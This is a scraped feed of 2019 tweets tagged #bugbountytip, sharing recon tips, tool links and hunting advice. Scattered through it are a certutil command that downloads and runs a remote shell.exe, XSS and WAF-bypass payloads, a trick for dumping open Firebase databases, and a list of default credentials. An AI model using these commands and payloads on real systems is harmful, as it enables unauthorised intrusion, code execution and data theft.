0 apps, I realized after reverse engineer, using tool like apktool, I was able to look at the AndroidManifest see all permissions, which often lead to stringxml where I would find content delivery, login ID & pass, fB tokens, googleapi, #bugbountytips #bugbountytip #togetherwehitharder https://t.co/ZBq3acOAoI
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-12-04 12:19:07
1 #bugbountytip All in one for Bug Bounty Hunters and pentesters https://t.co/lRPVHMHKAo
Ammar Amer🇸🇾
@cry__pto


2019-12-04 00:37:38
3 -Pen-testing resources.pdf: https://t.co/eykvQfDT5g -Shellcode: Encrypting traffic.pdf: https://t.co/QMsNonNYPZ -huge list of pentest tookit.pdf: https://t.co/LM0XUQb2AI -Information Gathering with theHarvester.pdf: https://t.co/ZFWOVqotm6 #bugbountytip #Hacking #osint #redteam
Tragger Osbourne
@OsbourneTragger


2019-12-03 22:31:18
0 I just find a bug 🐜 on android app Using firebase , I use apktool Then I look for AndroidManifest.xml , I found firebase they , I look for address in string.xml , I found firebase database and api keys 🔑 #bugbountytip #bugbountytips #togetherwehitharder
ᴂ
@pouyana1


2019-12-03 21:55:59
3 Of course that James Kettle articles are something else. @albinowax https://t.co/nsTQZFfzMX #bugbountytip #infosecurity #Security #websecurity
haxor_raheem
@HaxorRaheem


2019-12-03 18:31:52
1 Anyone know how to inject a "href" payload in "h1" payload . @Bugcrowd @Hacker0x01 #bugbountytip
ghostlulz
@ghostlulz1337


2019-12-03 18:26:53
9 Exposed Log Files - https://t.co/Kft6p37wJM Exposed Firebase DB - https://t.co/WGzatNLO3C Exposed Github Passwords- https://t.co/sGVY9UloQQ Hacking GraphQL - https://t.co/Z4ZBm3bN82 XSS SVG - https://t.co/5k3dGwkaGA #BugBounty #bugbountytips #bugbountytip #infosec #osint
Sebastian Wieseler
@kickino


2019-12-03 15:30:20
2 Controversial #bugbountytip Schedule meetings with (defence) vendors and learn about their technics and technologies. Engage with them during product demos and establish a deeper understanding of their products. You can also use “blue” knowledge for “red” approaches or #bugbounty
ᴂ
@pouyana1


2019-12-03 09:42:57
0 bugbounty tips : find hidden HTTP headers and inject them, simple way to reach high risk bugs. #BugBounty #bugbountytips #bugbountytip
Shaurya Sharma
@ShauryaSharma05


2019-12-03 08:39:35
0 I just finished writing a blog and it's a great read for those who are trying their luck in bug bounty "Haven’t founded any bounties yet? Hunt for these vulnerabilities in web applications for a better bounty!" https://t.co/NRSjy03JN5 #bugbounty #hacking #bugbountytip
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-12-03 08:28:35
0 #bugbountytip find open prod marathon instances in shodan. - “X-Marathon-Leader” - “ssl:Redacted” “X-Marathon-Leader”
soon
@soon73564093


2019-12-03 06:32:33
1 Bingo xss <3 #bugbounty #bugbountytip https://t.co/d6FilP9MWs
Shoeb Patel
@0xCaptainFreak


2019-12-03 04:08:04
0 I constantly take time out of App Security and learn something else to keep things interesting. System Design and Competitive programming Interests me a lot. 1. https://t.co/SpMqOJ40sE 2. https://t.co/hhWuOhB85V #bugbountytips #bugbountytip
SerWaf
@serialwaffle


2019-12-03 02:24:57
0 Can someone explain to me how the directories work in #hackerone? If I understand correctly, all of the directories are fair game (if I stick to the in-scope items of course). Can I just pick a Co. and start hunting???#bugbounty #bugbountytip @Hacker0x01
Sanketh Sharath
@sharathsanketh


2019-12-03 02:18:19
2 Web application architecture:Principles, protocols and practices by Shklar & Rosen seems to be a great book! It's doing a world of good to me in making me understand how web apps work. Definitely recommended for those getting into bugbounty #bugbountytips #bugbounty #bugbountytip
sudo ls /usr/local/protected 🔴
@AbdulConsole


2019-12-02 23:50:45
0 You don’t want to look at the website from a bird’s eye view and find low hanging fruit i.e, security vulnerabilities without any serious impact. #bughunting #bugbountytip #bugbountytips
Avanish Pathak
@avanish46


2019-12-02 18:33:32
0 Short Note On The $3000 XSS Found On the Public Program on @Bugcrowd #bugbountytip #bugbounty https://t.co/Avh1EW66KA https://t.co/Ef7EW6LwSg
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-02 17:07:17
0 Million Users PII Leak Data Leak Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/XOMt0BJnnn
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-02 17:03:30
0 How I could delete Facebook Ask for Recommendations post’s place objects in comments Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips https://t.co/3jmDgBbzsK
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-02 17:00:08
2 Subdomain Takeover Via Campaignmonitor . Com Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/nmegpRCRSs
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-02 16:58:31
0 Subdomain Takeover Via https://t.co/CYXQhAOtlh https://t.co/nmegpRCRSs Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-02 16:55:23
0 Disable Any Unconfirmed Account in Facebook https://t.co/p2TQTXMYW5 Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt Youtube - https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-02 16:52:38
0 Prowler: AWS CIS Benchmark Tool https://t.co/TfvuLHUcqN Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt LinkedIn - https://t.co/nhF4SN8Sd5 Youtube - https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-02 16:48:25
2 Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. https://t.co/ABDslQah52 Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #DevOps
Fisher
@Regala_


2019-12-02 16:28:59
2 I did this super tiny extension a while back that you can now find in the BApp Store. Just go to your Site Map -> Select All -> Right click -> Copy sub domains 🙂 #bugbounty #bugbountytip https://t.co/DiwqY76TUk
ghostlulz
@ghostlulz1337


2019-12-02 15:23:47
0 ITS CYBER MONDAY. If you're looking to make a living doing bug bounties you may want to get a copy of my book. I'll show you exactly how I operate. This is the last time i'll post this 🙂 https://t.co/zJFRZjg5q2 #bugbountytip #bugbountytips #bugbounty #osint #infosec #dfir https://t.co/VZ8FJPVoIO
Dujunayan
@dujunayan


2019-12-02 15:11:29
0 Google it, this's how make shit done <3 #bugbountytip
%00Termi
@Termi1215


2019-12-02 14:26:50
0 Sometimes i just wonder from where @ippsec has got all the knowledge in the world. Oscp , pentesting , bug bounty,red team just watch his videos. @elonmusk of pentesting world. #bugbounty #bugbountytip
ALL ABOUT HACKER
@AboutHacking


2019-12-02 13:21:30
0 How to start Bug Bounty Read -: https://t.co/b9iplwe1i8 #bugbountytip #bugbounty #bugbountytips #cybersecurity https://t.co/tkIgmb7yBH
🇳🇬Sam-Olayemi
@cykic_


2019-12-02 06:58:32
1 XSS cheat sheet contains many vectors that can help you bypass WAFs and filters #CyberSecurity #bugbountytip https://t.co/HfYpEaiOZ6
securibee 🐝
@securibee


2019-12-02 05:26:50
2 Free course "Automate the Boring Stuff with Python Programming" https://t.co/VfpiAK9jgw #bugbountytip #infosec
Sanketh Sharath
@sharathsanketh


2019-12-02 05:03:25
0 I use the community edition of Burp for bug hunting. Its a great tool, but I am really glad I am investing time learning how to use Zap too. This way I could leverage the features I am missing out on the Burp Pro edition. #bugbounty #bugbountytips #bugbountytip
ghostlulz
@ghostlulz1337


2019-12-01 22:10:28
6 If you are looking to make 🤑money🤑 as a pentester or bug bounty hunter you will want to get a copy of my book. WARNING INDUSTRY SECRETS WILL BE DROPPED!💰💰 https://t.co/zJFRZjg5q2 #bugbountytip #bugbountytips #bugbounty #infosec #redteam #osint #dfir #pentest https://t.co/gmUrqA1tW7
soon
@soon73564093


2019-12-01 18:20:31
3 Xss Go: https://t.co/hIsozDABTH Paste payload: "><script>alert(document.domain)</script> or "><script>alert(document.cookie)</script> @EBHORSMAN #bugbounty #bugbountytip https://t.co/kOp6LxATOV
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-01 18:09:43
1 Subscribe to Our Telegram Channel and Never miss an update on Zero day and New Bug Bounty Tips and Tricks https://t.co/pfl0JWOIqo Follow Us 💰💰 https://t.co/iNczOcXY13 Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #pentest
Brijesh Shah
@Brijesh1997


2019-12-01 16:44:37
0 URGENT: Best wordlists for fuzzing subdomains required. Found subdomain/assets/6193029F7C344C93BC50CBDBDC9AC91E.xls Need to find what else is exposed publicly. #bugbounty #bugbountytip #bugbountytips
lordsaibat
@lordsaibat


2019-12-01 13:58:37
1 @RealTryHackMe This is a great start into hacking and bug bounties if you are looking. All the rooms give you clear targets to hunt for. #bugbountytip #Hacking #infosec
Brute Logic
@brutelogic


2019-12-01 13:33:23
3 Old #bugbountytip from 5 years ago! https://t.co/7I6aZ5Fo6v
ninetynine
@ninetyn1ne_


2019-12-01 09:49:33
1 Quick tip - If Cross Origin Request allowed only from https://*.target.com, then try finding an XSS on any subdomain of the target, even if they are out of scope, and initiate a CORS request using that XSS. 🤘🤘 #bugbountytip #BugBounty
David Dale
@meathacker


2019-12-01 04:01:02
0 Hearing about IDORs? Not sure what they are? https://t.co/3MEbfcCL4j Great resource! #bugbountytip @Bugcrowd @samhouston
Armin Gojak
@fyoozr


2019-11-30 22:52:18
0 Nice step-by-step walkthrough for finding XSS by @brutelogic https://t.co/A7PsjSLSQQ #bugbounty #bugbountytip
Laszlo Kokai
@kokail


2019-11-30 20:43:11
0 RT @rez0__: Finally took the time to do a write up! Wrote up my first RCE (was also my first critical at that time): https://t.co/76981mCgLk #bugbountytips #bugbountytip There’s some shout-outs in this post to: @healthyoutlet @Michael1026H1 @NahamSec @stokfredrik @TomNomNom
Leonishan
@leonishan_


2019-11-30 19:32:04
3 Exploiting XSS with 20 characters limitation #XSS #bypass #bugbountytip #bugbounty https://t.co/k51H9OkNso
Ammar Amer🇸🇾
@cry__pto


2019-11-30 18:03:10
12 -1-Multiple Ways to Get root through Writable File.pdf: https://t.co/442zfZCBtm -2-CTF Series : Vulnerable Machines.pdf: https://t.co/DJMEurYB0d -3-Red Team Tips.pdf: https://t.co/NAJAIeEsK7 #bugbountytip #redteam #PenTest #Hacking #ctf #cybersecurity #infosec #BugBounty #OSINT
Sebastian Wieseler
@kickino


2019-11-30 05:16:25
1 Btw, my slides from my @div0_sg talk about XSS vulnerabilities are here: https://t.co/X968arapPd Enjoy 🙂 #bugbountytip #bugbountytools #bugbounty #togetherwehitharder
𝚛 𝚎 𝚣 𝟶
@rez0__


2019-11-30 03:14:29
1 Finally took the time to do a write up! Wrote up my first RCE (was also my first critical at that time): https://t.co/37N78DLalr #bugbountytips #bugbountytip There’s some shout-outs in this post to: @healthyoutlet @Michael1026H1 @NahamSec @stokfredrik @TomNomNom
Brijesh Shah
@Brijesh1997


2019-11-29 19:08:04
2 dig A <subdomain> is returning <subdomain> 60 IN SOA https://t.co/SBKgEiAHvQ. https://t.co/UerpKCDxNL 1 7200 900 120960060 Can i takover this subdomain? #bugbounty #bugbountytip #bugbountytips
ALL ABOUT HACKER
@AboutHacking


2019-11-29 18:54:34
0 Cross Site Scripting attack Basic to advance [ part 7]- Basic Burp suite Read:https://t.co/GRACpUbkBi #cybersecurity #cybersec #bugbounty #BugBountyTip #bugbountytips https://t.co/YF94iI795N
Hussein Daher
@HusseiN98D


2019-11-29 18:40:48
0 This was a really hard time for me, I'm back now. Thanks to everyone for your support and all the messages I got. A #bugbountytip will follow soon. Take care
ghostlulz
@ghostlulz1337


2019-11-29 12:55:16
0 Today is BLACK FRIDAY! If you are trying to make a living doing bug bounties you may want to get a copy of my latest book. I show you exactly how I hunt from start to finish. https://t.co/zJFRZjg5q2 #BugBounty #bugbountytips #bugbountytip #BlackFriday2019 #osint #dfir #infosec https://t.co/d1zC3PS0XR
intigriti
@intigriti


2019-11-29 12:38:38
3 🛍️It's also #BlackFriday in #BugBounty land 🛒! Harvest all the coupon codes, try this #BugBountyTip by @quintenvi and score some bounties! 💰 https://t.co/mZnQGkOnF3
Arif Khan
@payloadartist


2019-11-29 06:56:15
0 Nice step-by-step walkthrough for finding XSS by @brutelogic https://t.co/d998DJHlHm #bugbounty #bugbountytip
Ammar Amer🇸🇾
@cry__pto


2019-11-28 23:28:18
7 -Top 40 Best Linux Commands Cheat Sheet. Get It Free Now.pdf: https://t.co/2iKmWinQuN -Complete Google Dorks List in 2019 For Ethical Hacking and Penetration Testing.pdf: https://t.co/hdYVSGNQYs -Blue Team Tips.pdf: https://t.co/lq74aWZo9x #OSINT #bugbountytip #Linux #pentest
bugbountytip
@a_l_e_r_t_1_


2019-11-28 21:05:30
0 Happy Thanksgiving!! Bug bounty tips just 1 $ for 8 hours. Lets go guys. 😂 Lets hacking.. https://t.co/JPaA4CKmfO #bugbountytips #bugbountytip https://t.co/ZEIBuwiUDl
bugbountytip
@a_l_e_r_t_1_


2019-11-28 19:29:47
0 Hi guys. Subscribe my youtube channel for PoC and tutorial videos.. https://t.co/yyqYNBzlhi #Bugbountytips #Bugbountytip
chaitanya
@chaitanya0888


2019-11-28 19:17:14
3 #bugbounty #bugbountytips #bugbountytip 😂😂😂😂😂😂🤣 So, I got 1year free VPN from @wifimask Thanks to wifimask https://t.co/zLrurx34Zm
Pascal S
@PascalSec


2019-11-28 16:58:06
0 #bugbountytip huge productivity boost needed? Go and check out https://t.co/aZfbzgYuLc in case you use Firefox for testing. This eases multiple account / tenant testing by a mile. Shoutout to @infenet, who showed me this add-on in the first place! 🥳
ईशान सिंह
@R0X4R


2019-11-28 10:24:17
1 Something interesting for Bug Bounty Hunters. #bugbountytips #bugbounty #bugbountytip #bughunter #hacker #hacking https://t.co/sN4tuXtDce
Random Robbie
@Random_Robbie


2019-11-28 09:25:29
3 #bugbountytip when dealing with ysoserial and windows machines get a shell by doing certutil.exe -urlcache -split -f http://yoursite/shell.exe shell.exe & shell.exe Downloads and renames file and then runs it. save messing with powershell struggles.
Hendrik
@hendrikvb


2019-11-27 21:08:43
1 Grab your #pentesting course fix here during super #blackfriday deal at @PentesterLab #infosec #bugbountytip https://t.co/R2M2j9Q3dO
Elsadat
@M0_SADAT


2019-11-27 19:20:34
3 Today I finished my exams and So excited to find P1 after 2 hours of testing at private program found SQL injection and while reporting the issue discovered it's Out of scope subdomain💔 #bugbountytip read the target scope carefully to avoid this kind of heartbreaks #bugbounty
Paweł Hałdrzyński
@phaldrzynski


2019-11-27 18:32:50
2 @Hogarth45_ND @plmaltais You can make it even shorter (and get rid of white-space characters): text'/\u0061\u006C\u0065\u0072\u0074`1`// or when slashes are forbidden: text'-\u0061\u006C\u0065\u0072\u0074`1`-' #xss #bugbountytip
Johns
@Johnssimon22


2019-11-27 14:18:10
2 How was i able to access a disabled/hidden feature with the help of burpsuite match and replace feature #bugbountytip #bugbounty https://t.co/q6O93zv2uu
AkaaZaan
@AkaaZaan


2019-11-27 12:07:36
0 infosec people drop links, where I can learn Regex!!! #bugbountytip #bugbounty
bugbountytip
@a_l_e_r_t_1_


2019-11-27 11:55:50
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/sGQVdvW3cY
bugbountytip
@a_l_e_r_t_1_


2019-11-27 10:50:40
0 Party Time for laravel 😅 #bugbountytips #bugbountytip https://t.co/mubsogY68J
ghostlulz
@ghostlulz1337


2019-11-27 05:25:02
9 There are tons of tools for horizontal and vertical domain enumeration. I like to use Amass. In my youtube video I explain how to effectively use Amass in your reconnaissance process. https://t.co/ysW9JguyCV #bugbounty #bugbountytip #bugbountytips #infosec #amass #redteam
Ammar Amer🇸🇾
@cry__pto


2019-11-26 23:19:33
5 -subscribe to my youtube channel now -advanced videos tutorials about all hacking fields -parrotsec OS is the OS that gonna be used in the courses -learn ethical hacking in detail. https://t.co/m2akiMCaZI #bugbountytip #redteam #pentest #cybersecurity #malware
bugbountytip
@a_l_e_r_t_1_


2019-11-26 19:03:28
0 Look everywhere. Every user input, every parameter, cookies, headers . You can do it. All you need is patience and more reading.. #bugbountytip #bugbountytips https://t.co/Z49RnHRAxC
Vivek Yadav๐Ÿ’™ #Scaffold
@viveky259259


2019-11-26 18:40:26
0 Here's one more bug. This time by Spotify. In #payment section. When I choose #UPI as #payment at that time it should ask me #upi id/pin/address not postal pin. @Spotify @spotifyindia @BugBountyHQ #bugbountytip #bug #music #app #AndroidDev #SpotifyPremium https://t.co/HQ3J1V6mrA
ghostlulz
@ghostlulz1337


2019-11-26 18:21:56
8 Seriously, another unauthenticated database. Google Firebase is a ripe target for getting easy wins, just append "/.json" to the URL and it dumps the entire database. More info on my blog: https://t.co/WGzatNLO3C #BugBounty #bugbountytips #bugbountytip #firebase #infosec
Ananda Dhakal
@dhakal_ananda


2019-11-26 15:36:59
1 Feedback from a private program on @Hacker0x01. They had closed the report as N/A because they did not quite get the report. I made sure to provide all the details clearly once again and it is pending resolution. [1/2] #hackerone #bugbounty #bugbountytip https://t.co/kris0pXagG
Üzeyir 👨🏻‍💻
@destanuzeyirr


2019-11-26 12:57:15
0 Does anyone know Cookie Based XXE , I may need some help #bugbounty #bugbountytip #togetherwehitharder
Ammar Amer🇸🇾
@cry__pto


2019-11-26 11:28:52
3 -Undetectable C#&C++ Reverse Shells.pdf: https://t.co/08CJhmLAbr -35+ Best Free NMap Tutorials and Courses.pdf: https://t.co/wNd4XNabzv -HTB: Luke.pdf https://t.co/dFYLXTo7zb -How to become a cybersecurity pro.pdf: https://t.co/ODbsUfZpe4 #bugbountytip #hacking #pentest #redteam
Alexander Khovansky
@al_khovansky


2019-11-26 07:50:56
0 *cough* Command-Option-F dangerouslySetInnerHTML *cough* #bugbountytip https://t.co/QScWlAc9Km
tololovejoi
@tolo7010


2019-11-26 00:27:09
2 Your weakness is determined by how do you live with your success. Your strength is determined by how do you handle your difficulties. #motivation #bugbounty #bugbountytip #infosec #hacking #bugbountytips #motivationquotes
Ismayil Tahmazov
@Tismayil1


2019-11-25 21:36:00
0 Sharing is good. Sharing increases happiness. #bugbounty #bugbountytip #bugbountytips #infosec @Nep_1337_1998 https://t.co/VWoZ4xc7cG
Brodie Codie
@brodie_codie


2019-11-25 20:41:20
0 I started doing #bugbounty in Sept, set a goal to reach top 50 in this program... Almost there Tip 2. KEEP READING #movingup #10000Hours #KEEPGOING #perseverance #Bugbountytip #bugbounty @emenalf ๐Ÿ‘€ https://t.co/YK0XF6uxkb
m0z
@LooseSecurity


2019-11-25 16:42:45
0 Someone just told me they once found company credentials on pastebin. #bugbountytip #bugbounty #bugbountytips #bugbounties #infosec
Security Executions Code
@pwn0sec


2019-11-25 16:35:17
0 Web cache poisoning attack https://t.co/G5ahhQidlh #bugbounty #bugbountytip #bugbountytips #webcache_poisoning_attack
drivertom
@drivertomtt


2019-11-25 16:13:40
0 @Xiaomi #bugbountytips #bugbountytip Never dig ANY vulnerabilities in products that are not admitted by their vendors. https://t.co/MpBnJuVmIh
Security Executions Code
@pwn0sec


2019-11-25 14:46:07
0 Web cache poisoning attack https://t.co/VPiOxCGk3K #bugbounty #bugbountytip #bugbountytips #webcache_poisoning_attack
Wh11teW0lf
@Wh11teW0lf


2019-11-25 11:23:55
5 #bugbountytip Default credentials that i always try: admin:admin test:test admin:password admin:pass [email protected]:test [email protected]:test (try with all domains that belong to company) [email protected]:[email protected],com
Security Executions Code
@pwn0sec


2019-11-25 10:50:26
0 Bug Bounty Panasonic : Reflected (XSS) Vulnerability https://t.co/LnMgHCYvxW #bugbounty #bugbountytip #bugbountytips #xss
Pankaj 🇳🇵🇮🇳 🇷🇺
@Nep_1337_1998


2019-11-25 10:47:48
0 Thank you @Tismayil1 for your notes Yes I was awarded with €600. Tools Sub Scanner : https://t.co/hZCWhAbzEm Dir Scanner : https://t.co/9n9y4T5EXE Git Dumper : https://t.co/7z9cdDA26W #BugBounty #bugbountytips #bugbountytip #whitehat #infosec https://t.co/SLAzoRn8Nz
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-11-25 08:13:46
0 Look out the window...if that’s not your dream view...get back to work! #bugbountytip
nutronex
@nutronex


2019-11-25 07:12:48
0 Lfi (cannot use log poison)> download source codes > found database credentials > found hidden admin panel > tried to login admin panel with these credentials > success > file upload > rce #bugbountytip
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-11-25 06:07:56
0 Cool video about vim 😀 #bugbountytip https://t.co/tBsAbNk3UO
ninetynine
@ninetyn1ne_


2019-11-25 04:43:27
0 Quick tip - If '/something' => 403 Try - '/something/' '/something/%20' '/something.html' '/something.json' '/something/?anything' '/something#' Works sometimes🤘 Happy hacking....!!! #bugbounty #bugbountytip
Mashoud1122
@mashoud1122


2019-11-24 21:42:23
1 I just published my 1st Write UP.Writing it was harder than I thought. here you go: CORS Misconfiguration ->Account TakeOver [Out of scope to grab items In-Scope] #BugBounty #BugBountyTip #BugBountyTips https://t.co/6Ke09g37L5
Nosense
@Nosense08537389


2019-11-24 19:57:15
1 Hello friends! I'm trying the exploit 44298 with kernel 4.4.0-87 and ubuntu 16.04.3 but when I run it it provides me invalid argument. Can someone help me with what I should do? #bugbounty #hackthebox #PenTest #bountybug #bugbountytip #CyberSecurity #Hacking
👻in🐚
@0xerror


2019-11-24 19:09:39
3 XSS News: @spyerror: 'Cloudflare {XSS} «byPass detection» `payload´; %3Cimg src='null' onerror=alert('spyerror')%3E #BugBounty #BugBountyTip #WAF #infosec ' https://t.co/XopkzOyBE8, see more https://t.co/4VACxHYGGn
BlackClover
@Bc10ver


2019-11-24 19:09:39
2 Top story: @spyerror: 'Cloudflare {XSS} «byPass detection» `payload´; %3Cimg src='null' onerror=alert('spyerror')%3E #BugBounty #BugBountyTip #WAF #infosec ' https://t.co/mW90LakWPL, see more https://t.co/fVnXn9Z0FJ
Pratik Yadav
@PratikY9967


2019-11-24 17:31:01
8 SSTI while sending money from one account to another. I inserted a normal payload {{7*7}} in note section. Probably others have missed this bug because no one wants to spend a small amount for testing. #bugbounty #bugbountytip https://t.co/k4dq1Xa3Tn
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍 台風
@spyerror


2019-11-24 13:24:05
6 Cloudflare {XSS} «byPass detection» `payload´; %3Cimg src='null' onerror=alert('spyerror')%3E #BugBounty #BugBountyTip #WAF #infosec https://t.co/oHTNwiv6Au
ghostlulz
@ghostlulz1337


2019-11-24 13:21:21
9 If you're wanting to become a full time bug bounty hunter or penetration tester you may want to get a copy of my book. WARNING INDUSTRY SECRETS WILL BE DROPPED. https://t.co/zJFRZjg5q2 #BugBounty #bugbountytip #bugbountytip #infosec #appsec #redteam #PenTest #DFIR #OSINT #xss https://t.co/iBiJBKWwPU
vinod3070
@vinod3070


2019-11-24 11:37:41
0 It's a project management tool, if I put my vps link in the group chat box I get GET req to my VPS. Nothing else is working. Any leads ? #bugbountytips #bugbountytip #hackerone #recon #ssrf
luis madero
@_Y000_


2019-11-24 00:27:50
3 Exploiting a CORS (cross-origin resource sharing) vulnerability. #hacked #cors #bugbountytip #bugbounty #CyberSecurity https://t.co/vWzRICB3T1
Shammah Agwor
@Zealsham


2019-11-23 23:01:26
0 Search shodan for “aquatone_report.html” get access to dozen of recon data from other bug hunters 😂😂. #Bugbountytip #bugbounty
Halil AHMAD
@Halilahmadd


2019-11-23 21:39:11
4 Cloudflare Bypass Payload:<svg onload=prompt%26%230000000040document.domain)> Hex: <svg onload=prompt%26%23x000000028;document.domain)> #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security @XssPayloads
healthyoutlet
@healthyoutlet


2019-11-23 20:49:38
0 Get all the urls out of a sitemap.xml with curl and xmllint in a bash oneliner. curl -s https://t.co/A6bYnXdhNI | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g' #bugbountytip
ticarpi
@ticarpi


2019-11-23 20:40:15
3 jwt_tool v1.3.2 now has improved 'Spoof JWKS' functionality https://t.co/yA6KVOSEqO #jwt #jwks #bugbountytip #netsec https://t.co/uH8H4LwB9J
Pavandeep
@Pavandep8


2019-11-23 15:43:20
0 Look what I shared: SQL Injection Step By Step Part 1 - Nilesh Sanyal - Medium @MIUI| #bugbountytip #Hacker #security https://t.co/deek38JH50
Nick || hunt4p1zza
@ngkogkos


2019-11-23 15:08:38
6 Burp has many features to help your workflow & better -> more bugs. In my @Burp_Suite proxy, I constantly use a search regex pattern that includes standard placeholders I use within my payloads, such as zzz/xss, and I keep adding to it. #burpsuitetip #bugbountytip #BugBounty https://t.co/3CHDtFGQeF
Paresh
@Paresh_parmar1


2019-11-23 10:10:04
8 #bugbountytip decompile android app. and go to : Resources > resources.arsc > res > values > strings.xml search for *.firebaseio.com in xml file. ,and open browser try https://*.firebaseio.com/.json , you might find read access to database there. #bugbountytips . https://t.co/eZPSqnAbWV
ninetynine
@ninetyn1ne_


2019-11-23 08:24:59
0 XSS tip - when looking for XSS, try functions like - 'confirm()' and 'eval()' instead of 'alert()' & 'prompt()' to bypass the WAF. #bugbountytip #BugBounty
ghostlulz
@ghostlulz1337


2019-11-23 07:08:39
9 Expanding your scope on a bug bounty program is a great way to gain more vulnerabilities.Horizontal domain enumeration is a technique used to find domains of an organization. More information on my youtube video: https://t.co/nrVeAWSmxV #bugbountytip #BugBounty #bugbountytips
HackIsOn ®
@hackison


2019-11-23 04:44:08
13 Everytime shodan gives a surprise to our #cybersecurity community 😎😎 Utilise it everyone 🤗 #BugBounty #bugbountytip #bugbountytips #hacking #cybersecurity #linux #Ubuntu #hacking #hackers #owasp #bug #vulnerability #redteam #redteaming https://t.co/XAYGEChP7d
Ammar Amer🇸🇾
@cry__pto


2019-11-22 19:13:56
15 -Web Application Penetration Testing Course.pdf: https://t.co/GlebM7I7b0 -20 Best HTML Cheat Sheet Of 2019 | With All New HTML5 Tags.pdf: https://t.co/59tuOLtNSb -Fasten your Recon process using Shell Scripting.pdf: https://t.co/33JZAQ2k4n #html #Hacking #bugbountytip #PenTest
healthyoutlet
@healthyoutlet


2019-11-22 18:41:00
0 1) Find as many domains as you can that are owned by the target org: https://t.co/sTkppJra4w 2) run subdomain discovery on all of them 3) make a wordlist of all discovered subdomains 4) run massdns on in scope domains with that wordlist. #bugbountytip
florens
@florens25301329


2019-11-22 17:27:55
0 Need some help to exploit DOM-XSS will share bounty! #BugBounty #bugbountytip #togetherwehitharder
Yash sariya
@stylish_hacker_


2019-11-22 08:33:44
0 How to become a successful bug hunter https://t.co/nYs8qifcA0 #bugbounty #bugbountytip #bugbountytips
Yash sariya
@stylish_hacker_


2019-11-22 08:32:27
0 What is web server fingerprint https://t.co/BdmKPXFPpd #bugbounty #bugbountytip #bugbountytips
Yash sariya
@stylish_hacker_


2019-11-22 08:26:59
0 Complete Recon Process A to z https://t.co/msMzOd0Ja7 #bugbountytip #bugbounty #bugbountytips
Udit Bhadauria
@udit_thakkur


2019-11-22 06:59:54
0 @NahamSec just uploaded his talk at @defcon "Owning The Clout Through SSRF" with @daeken! https://t.co/jb7XuGIXyN The pdf can be found: https://t.co/R7gbIXgItf & if you want to practice it, consider looking into @PentesterLab's exercise of brown badge. #infosec #bugbountytip
Brodie Codie
@brodie_codie


2019-11-22 05:04:54
0 so aquatone has its own probe to check if links are alive with this option found 2 admin panels this way "cat List.txt| aquatone -ports xlarge" #bugbountytips #bugbountytip
Securisec 🚀
@securisec


2019-11-22 01:33:31
0 "RT RT Tismayil1: Yes I earned $3180. Tools : Sub Scanner : https://t.co/VcdATHEpOs Dir Scanner : https://t.co/HJAwQE187M Git Dumper : https://t.co/ZKqKYdHhkG #BugBounty #bugbountytips #bugbountytip #whitehat #infosec https://t.co/UGa0yAvGEx"
healthyoutlet
@healthyoutlet


2019-11-21 23:14:43
0 #bugbountytip keep your hackerone inbox open so that it's super easy to check for updates on that crit every 15 minutes for the next week. Bonus tip: Have a pint of ben and jerry's ready for when it gets marked dupe.
Binit Ghimire
@WHOISbinit


2019-11-21 19:51:51
1 When you are using a XSS payload in email field during registration and it doesn't execute after creating the account, try choosing the "Resend Activation Email" option. Developers are likely to forget filtering the email in activation email resent message. #XSS #BugBountyTip
Ismayil Tahmazov
@Tismayil1


2019-11-21 19:03:42
